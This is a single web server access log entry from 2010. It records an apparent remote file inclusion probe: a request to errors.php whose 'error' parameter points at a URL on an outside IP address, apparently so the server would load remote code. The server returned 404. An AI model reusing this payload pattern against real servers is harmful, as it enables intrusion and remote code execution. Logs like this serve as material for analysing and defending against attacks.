125.128.28.202 - - [25/Jan/2010:08:42:29 -0800] "GET /logs/access.log%20%20//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
